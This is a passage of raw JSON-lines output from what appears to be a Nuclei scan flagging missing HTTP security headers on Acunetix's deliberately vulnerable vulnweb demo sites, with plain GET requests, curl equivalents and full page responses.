Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/samples\",\"path\":\"/samples\",\"matched-at\":\"http://testhtml5.vulnweb.com/samples\",\"request\":\"GET /samples HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\n\\u003chead\\u003e\\n \\u003ctitle\\u003ePython samples\\u003c/title\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n \\u003ch3\\u003eSimple python programs:\\u003c/h3\\u003e\\n \\u003cul\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eFirst sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eSecond sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.526978037Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"path\":\"/ajax/archive\",\"matched-at\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"request\":\"GET /ajax/archive HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 2\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n[]\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.531624686Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"path\":\"/CVS/Entries\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries\",\"request\":\"GET /CVS/Entries HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.531867718Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.53194702Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:49.53200874Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour 